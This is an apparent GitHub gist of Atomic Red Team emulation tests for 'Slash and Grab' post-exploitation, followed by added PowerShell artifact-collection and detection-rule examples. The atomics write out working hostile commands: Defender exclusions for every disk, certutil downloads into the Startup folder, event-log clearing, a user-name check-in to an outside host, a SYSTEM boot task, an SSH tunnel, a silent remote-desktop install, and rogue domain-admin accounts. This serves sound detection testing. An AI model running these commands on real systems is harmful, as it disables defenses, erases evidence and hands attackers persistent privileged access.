@MHaggis
Last active February 27, 2024 14:48
Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls
attack_technique: Many
display_name: Slash and Grab Post-Ex
atomic_tests:
- name: Add all logical disks to Windows Defender exclusion list
  description: |
    This test adds every logical disk on the system (C:, D:, ...) to the Windows Defender exclusion list, so nothing on those volumes is scanned. Verify with (Get-MpPreference).ExclusionPath; cleanup removes the same entries.
  supported_platforms:
  - windows
  executor:
    command: |
      foreach ($disk in Get-WmiObject Win32_LogicalDisk) { Add-MpPreference -ExclusionPath $disk.DeviceID }
    cleanup_command: |
      foreach ($disk in Get-WmiObject Win32_LogicalDisk) { Remove-MpPreference -ExclusionPath $disk.DeviceID -ErrorAction Ignore }
    name: powershell
    elevation_required: true
- name: certutil download (urlcache)
  description: |
    Use the certutil -urlcache argument to download a file from the web, then move it into the all-users Startup folder so it runs at the next logon. Writing to that folder requires administrator rights. Cleanup deletes the copy left in the Startup folder by file name, so file_name must be the file name part of local_path.
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to copy
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi
    local_path:
      description: Local path (including file name) to place the downloaded file
      type: path
      default: c:\mpyutild.msi
    file_name:
      description: File name part of local_path, used to remove the copy left in the Startup folder
      type: string
      default: mpyutild.msi
  executor:
    command: |
      certutil -urlcache -f #{remote_file} #{local_path}
      move #{local_path} "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    cleanup_command: |
      del #{local_path} >nul 2>&1
      del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\#{file_name}" >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Clear Logs
  description: |
    Upon execution this test clears the Windows Event Log named by log_name (System by default). Open #{log_name}.evtx under C:\Windows\System32\winevt\Logs, or run wevtutil qe #{log_name} /c:5, and verify the log is now empty. Clearing System leaves a single event ID 104 and clearing Security leaves a single event ID 1102, each recording that the log was cleared.
  supported_platforms:
  - windows
  input_arguments:
    log_name:
      description: Windows Log Name, ex System
      type: string
      default: System
  executor:
    command: |
      wevtutil cl #{log_name}
    name: command_prompt
    elevation_required: true
- name: UserName Checkin
  description: |
    This test checks in with a remote server using PowerShell. The default URL ends in $env:UserName, which PowerShell expands when the command runs, so the request path carries the current user name.
  supported_platforms:
  - windows
  input_arguments:
    url:
      description: URL to check in with
      type: url
      default: https://9d06e4f428c94e3295277e2784036c61.api.mockbin.io/MyUserName_$env:UserName
  executor:
    command: |
      powershell -c "Invoke-WebRequest -Uri #{url}"
    name: command_prompt
    elevation_required: false
- name: Create Scheduled Task
  description: |
    This test creates a scheduled task with SCHTASKS that runs as SYSTEM at the highest run level five seconds after every boot (/SC ONSTART /DELAY 0000:05). The default task name and binary path mimic the campaign; schtasks does not check that task_run exists, so the task is created even though the binary is absent.
  supported_platforms:
  - windows
  input_arguments:
    task_name:
      description: Name of the task
      type: string
      default: "\\Microsoft\\Windows\\Wininet\\UserCache_1708535250863"
    task_run:
      description: Task to be run
      type: string
      default: "C:\\Windows\\Help\\Help\\SentinelUI.exe"
  executor:
    command: |
      SCHTASKS /Create /TN "#{task_name}" /TR "#{task_run}" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05
    cleanup_command: |
      SCHTASKS /Delete /TN "#{task_name}" /F
    name: command_prompt
    elevation_required: true
- name: Download PuTTY and setup SSH tunnel
  description: |
    This test downloads PuTTY from the official site into C:\putty and starts it hidden as user tunnel against port 443 of host, with -L 9595:localhost:3389 (a listener on local port 9595 that the SSH server forwards to its own port 3389). Against the default host the connection simply fails; point host at an SSH server that accepts the tunnel account to see the forward. The commands run natively under the powershell executor.
  supported_platforms:
  - windows
  input_arguments:
    host:
      description: SSH host
      type: string
      default: example.com
  executor:
    command: |
      New-Item -ItemType Directory -Path C:\putty -Force | Out-Null
      Invoke-WebRequest -Uri https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -OutFile C:\putty\putty.exe
      $puttyArgs = @('tunnel@#{host}', '-P', '443', '-N', '-ssh', '-L', '9595:localhost:3389')
      (Start-Process -FilePath C:\putty\putty.exe -ArgumentList $puttyArgs -PassThru -WindowStyle Hidden).Id
    cleanup_command: |
      Stop-Process -Name putty -Force -ErrorAction Ignore
      Remove-Item -Path C:\putty -Recurse -Force -ErrorAction Ignore
    name: powershell
    elevation_required: false
- name: Download and Install Chrome Remote Desktop Host
  description: |
    This test downloads the Chrome Remote Desktop Host MSI into ProgramData as 1.msi and installs it silently with msiexec. Cleanup uninstalls the package and deletes the MSI.
  supported_platforms:
  - windows
  executor:
    command: |
      $path = Join-Path -Path $env:ProgramData -ChildPath '1.msi'
      (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $path)
      Start-Process 'msiexec.exe' -ArgumentList "/i `"$path`" /qn" -Wait
    cleanup_command: |
      $path = Join-Path -Path $env:ProgramData -ChildPath '1.msi'
      Start-Process 'msiexec.exe' -ArgumentList "/x `"$path`" /qn" -Wait
      Remove-Item -Path $path -Force -ErrorAction Ignore
    name: powershell
    elevation_required: true
- name: Add Users and Assign Groups
  description: |
    This test creates domain accounts (default, default1, temp) and adds them to privileged domain groups, and creates a local account (oldadmin) in the local Administrators group. The domain steps must run on a domain-joined host as a user who can create accounts and modify those groups; Enterprise Admins and Schema Admins exist only in the forest root domain. Remote Desktop Users is a built-in domain local group, so it is managed with net localgroup /domain rather than net group. Cleanup removes group memberships first and then the accounts.
  supported_platforms:
  - windows
  executor:
    command: |
      net user default test@2021! /add /domain
      net group "Domain Admins" default /add /domain
      net group "Enterprise Admins" default /add /domain
      net localgroup "Remote Desktop Users" default /add /domain
      net group "Group Policy Creator Owners" default /add /domain
      net group "Schema Admins" default /add /domain
      net user default /active:yes /domain
      net user default1 test@2021! /add /domain
      net user oldadmin Pass8080!! /add
      net localgroup administrators oldadmin /add
      net user temp 123123qwE /add /domain
      net group "Domain Admins" temp /add /domain
    cleanup_command: |
      net group "Domain Admins" default /delete /domain
      net group "Enterprise Admins" default /delete /domain
      net localgroup "Remote Desktop Users" default /delete /domain
      net group "Group Policy Creator Owners" default /delete /domain
      net group "Schema Admins" default /delete /domain
      net user default /delete /domain
      net user default1 /delete /domain
      net localgroup administrators oldadmin /delete
      net user oldadmin /delete
      net group "Domain Admins" temp /delete /domain
      net user temp /delete /domain
    name: command_prompt
    elevation_required: true
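Each test above tells you what to verify by hand after it runs. The PowerShell function below is an added example, not part of the gist or of Atomic Red Team, that collects those host-side artifacts in one pass so you can compare the state before execution, after execution, and after cleanup. The Startup folder, the task-name pattern (UserCache_ followed by digits), the tunnel port and the privileged group names are taken from the test defaults; the Chrome Remote Desktop service name chromoting is an assumption, as is the one-day look-back for newly created accounts. Run it elevated; the domain checks only run where the ActiveDirectory module is installed.

```powershell
# Added example, not part of the gist: enumerate the host-side artifacts the atomics leave
# behind. Defaults come from the test defaults; 'chromoting' (service name) and the one-day
# look-back are assumptions. Run elevated before execution, after execution, and after cleanup.

function Get-SlashAndGrabArtifacts {
    param(
        [string]$StartupDir   = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup',
        [string]$TaskPattern  = '^UserCache_\d+$',
        [int]$TunnelPort      = 9595,
        [datetime]$Since      = (Get-Date).AddDays(-1),
        [string[]]$PrivGroups = @('Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Group Policy Creator Owners')
    )
    $findings = [System.Collections.Generic.List[object]]::new()
    function Add-Finding([string]$Check, [string]$Detail) {
        $findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
    }

    # 1. Defender exclusions that cover an entire volume (test 1 excludes every logical disk)
    $volumes = (Get-CimInstance Win32_LogicalDisk).DeviceID          # e.g. C:
    foreach ($path in (Get-MpPreference).ExclusionPath) {
        if ($volumes -contains $path.TrimEnd('\')) { Add-Finding 'Defender exclusion covers whole volume' $path }
    }

    # 2. Anything dropped into the all-users Startup folder (test 2 moves the downloaded MSI there)
    Get-ChildItem -LiteralPath $StartupDir -File -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'File in all-users Startup folder' $_.FullName }

    # 3. Log clearing (test 3): System 104 records a cleared log, Security 1102 a cleared Security log
    foreach ($query in @(@{ LogName = 'System'; Id = 104 }, @{ LogName = 'Security'; Id = 1102 })) {
        Get-WinEvent -FilterHashtable $query -MaxEvents 5 -ErrorAction SilentlyContinue |
            ForEach-Object { Add-Finding "Event log cleared ($($query.LogName)/$($query.Id))" $_.TimeCreated }
    }

    # 4. Scheduled tasks (test 5): name matches the campaign pattern, or the action binary does not exist
    foreach ($task in Get-ScheduledTask) {
        $exe = ($task.Actions | Where-Object { $_.Execute } | Select-Object -First 1).Execute
        if ($exe) { $exe = [Environment]::ExpandEnvironmentVariables($exe.Trim('"')) }
        $missingBinary = $exe -and $exe -match '\\' -and -not (Test-Path -LiteralPath $exe)
        if ($task.TaskName -match $TaskPattern -or $missingBinary) {
            Add-Finding 'Suspicious scheduled task' "$($task.TaskPath)$($task.TaskName) -> $exe (RunAs $($task.Principal.UserId))"
        }
    }

    # 5. PuTTY tunnel (test 6): a putty process and a listener on the forwarded local port
    Get-Process -Name putty -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'PuTTY running' "PID $($_.Id) $($_.Path)" }
    Get-NetTCPConnection -LocalPort $TunnelPort -State Listen -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding "Listener on tunnel port $TunnelPort" "PID $($_.OwningProcess)" }

    # 6. Chrome Remote Desktop host (test 7); 'chromoting' is the assumed service name
    Get-Service -Name chromoting -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'Chrome Remote Desktop service present' "$($_.Name) $($_.Status)" }

    # 7. Accounts (test 8): recently created local accounts (PasswordLastSet is set at creation)
    #    and whether they sit in Administrators; new domain accounts and how many privileged groups
    #    they were placed in (needs the ActiveDirectory module)
    $localAdmins = (Get-LocalGroupMember -Group Administrators -ErrorAction SilentlyContinue).Name
    Get-LocalUser | Where-Object { $_.PasswordLastSet -ge $Since } | ForEach-Object {
        $isAdmin = $localAdmins -contains "$env:COMPUTERNAME\$($_.Name)"
        Add-Finding 'Recently created local account' "$($_.Name) (Administrators: $isAdmin)"
    }
    if (Get-Command Get-ADUser -ErrorAction SilentlyContinue) {
        Get-ADUser -Filter 'whenCreated -ge $Since' -Properties whenCreated, MemberOf | ForEach-Object {
            $privileged = @($_.MemberOf | Where-Object { (($_ -split ',')[0] -replace '^CN=') -in $PrivGroups })
            Add-Finding 'Recently created domain account' "$($_.SamAccountName) privileged groups: $($privileged.Count)"
        }
    }
    return $findings
}

# Usage: snapshot the host, run the atomics, snapshot again, then run cleanup and snapshot a third time.
Get-SlashAndGrabArtifacts | Format-Table -AutoSize -Wrap
```

After cleanup the only rows that should remain are the log-clearing events (test 3 has no cleanup, and the clear itself is recorded) and any pre-existing built-in tasks whose action binary is missing on that host; anything else means a cleanup command failed.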
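The command lines in these tests are also what a detection engineer would key on in process-creation telemetry. The following is an added PowerShell example, not part of the gist or of Atomic Red Team: one rule per atomic, run over a handful of constructed records shaped like the CommandLine field of Sysmon Event ID 1 or Security 4688. The host name, user and timestamps are made up, and the ATT&CK IDs are the techniques the commands map to. The UserName check-in test is omitted on purpose: a bare Invoke-WebRequest is not something to alert on from the command line alone.

```powershell
# Added example (not from the gist or Atomic Red Team): one process-creation rule per atomic,
# run over constructed records. Host names, users and timestamps are made up; ATT&CK IDs are
# the techniques the commands map to. PowerShell -match is case-insensitive, so no (?i) is needed.

$Rules = @(
    @{ Name = 'Defender exclusion added'; Technique = 'T1562.001'
       Pattern = 'Add-MpPreference\b.*-ExclusionPath\b' },
    @{ Name = 'certutil URL download'; Technique = 'T1105'
       Pattern = 'certutil(\.exe)?"?\s.*-urlcache\b' },
    @{ Name = 'Event log cleared'; Technique = 'T1070.001'
       Pattern = 'wevtutil(\.exe)?"?\s+cl\s' },
    # lookaheads make the switch order irrelevant: /Create, /RU SYSTEM and /SC ONSTART in any order
    @{ Name = 'SYSTEM task triggered at boot'; Technique = 'T1053.005'
       Pattern = 'schtasks(\.exe)?"?\s(?=.*/create\b)(?=.*/ru\s+system\b)(?=.*/sc\s+onstart\b)' },
    # -L (local) and -R (remote) forwards both carry a port:host:port triple
    @{ Name = 'PuTTY SSH port forward'; Technique = 'T1572'
       Pattern = 'putty(\.exe)?"?\s.*\s-[LR]\s+\S+:\S+:\d+' },
    @{ Name = 'MSI installed from ProgramData root'; Technique = 'T1219'
       Pattern = 'msiexec(\.exe)?"?\s(?=.*/i\b).*[A-Za-z]:\\ProgramData\\[^\\"]+\.msi' },
    @{ Name = 'Account added to privileged domain group'; Technique = 'T1098'
       Pattern = 'net1?(\.exe)?"?\s+group\s+"?(domain|enterprise|schema) admins"?\s+\S+\s+/add\b' }
)

function Find-SlashAndGrabActivity {
    # Emits one object per (record, rule) hit; a record matching two rules yields two rows.
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($record in $Events) {
        foreach ($rule in $Rules) {
            if ($record.CommandLine -match $rule.Pattern) {
                [pscustomobject]@{
                    Time        = $record.Time
                    Host        = $record.Host
                    User        = $record.User
                    Rule        = $rule.Name
                    Technique   = $rule.Technique
                    CommandLine = $record.CommandLine
                }
            }
        }
    }
}

# Constructed sample records: the first seven reproduce the atomics' command lines as they would
# appear in process-creation logs, the last two are benign look-alikes that must not fire.
$SampleCommandLines = @(
    'powershell.exe -c "foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid}"',
    'cmd /c certutil -urlcache -f https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi c:\mpyutild.msi',
    'wevtutil cl System',
    'SCHTASKS /Create /TN "\Microsoft\Windows\Wininet\UserCache_1708535250863" /TR "C:\Windows\Help\Help\SentinelUI.exe" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05',
    '"C:\putty\putty.exe" tunnel@example.com -P 443 -N -ssh -L 9595:localhost:3389',
    'msiexec.exe /i "C:\ProgramData\1.msi" /qn',
    'net group "Domain Admins" temp /add /domain',
    'certutil -hashfile C:\Users\jdoe\Downloads\setup.exe SHA256',
    'schtasks /Create /TN NightlyBackup /TR C:\Tools\backup.cmd /SC DAILY /ST 02:00'
)
$SampleEvents = for ($i = 0; $i -lt $SampleCommandLines.Count; $i++) {
    [pscustomobject]@{ Time = "2024-02-21T14:2${i}:00Z"; Host = 'WS01'; User = 'CORP\jdoe'; CommandLine = $SampleCommandLines[$i] }
}

# Usage: seven hits (one per campaign-style record), nothing for the two benign records.
Find-SlashAndGrabActivity -Events $SampleEvents | Format-Table Time, Rule, Technique -AutoSize
```

The rules are deliberately anchored on the switches rather than on the campaign's file names, so they still fire when an operator changes the task name, drop path or tunnel port; the trade-off is that the msiexec and schtasks rules will need tuning against whatever software deployment runs in your environment.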